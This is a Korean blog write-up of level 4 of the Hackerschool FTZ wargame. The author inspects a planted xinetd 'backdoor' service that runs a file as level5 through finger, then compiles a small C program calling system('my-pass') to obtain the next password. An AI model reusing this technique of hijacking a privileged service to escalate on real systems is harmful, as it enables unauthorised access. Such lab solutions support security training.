Hello, Stranger

[F.T.Z] level4 본문

CTF & War game/F.T.Z(해커스쿨)

[F.T.Z] level4

blackcon 2013.01.07 13:49

[level4@ftz level4]$ ls

hint  public_html  tmp


[level4@ftz level4]$ cat hint

누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!


/etc/xinetd.d로 이동을 하겠슴돠
[level4@ftz xinetd.d]$ ls -l
합계 84
-rw-r-----    1 root     level4        171 12월  8  2003 backdoor
-rw-r--r--    1 root     root          563  2월 25  2003 chargen
-rw-r--r--    1 root     root          580  2월 25  2003 chargen-udp
-rwxr-xr-x    1 root     root          239  2월 13  2003 cups-lpd
-rw-r--r--    1 root     root          453 12월 19  2008 daytime
(생략)...
[level4@ftz xinetd.d]$ cat backdoor
service finger
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}
finger명령어를 입력하면 level5의 권한으로 /home/level4/tmp/backdoor을 실행시키는 겁니다.
$vi backdoor.c

#include<stdio.h>

main()
{

        system("my-pass");

}
위의 코드를 작석하셔서 backdoor로 컴파일 시켜줍니다.

 빠밤!!! get Password :)


=================

알게된 것

 #backdoor :: 시스템침투에 성공한 크래커가 쉽게 침투하기 위해 만든 뒷문

 #/etc/xinetd.d ::슈퍼데몬(자세한 사항 : http://light99.egloos.com/5142379)



저작자 표시
신고

'CTF & War game > F.T.Z(해커스쿨)' 카테고리의 다른 글

[F.T.Z] level4  (2) 2013.01.07
[F.T.Z] level3  (0) 2013.01.07
[F.T.Z] level2  (0) 2013.01.07
[F.T.Z] level 1  (0) 2013.01.07
2 Comments
댓글쓰기 폼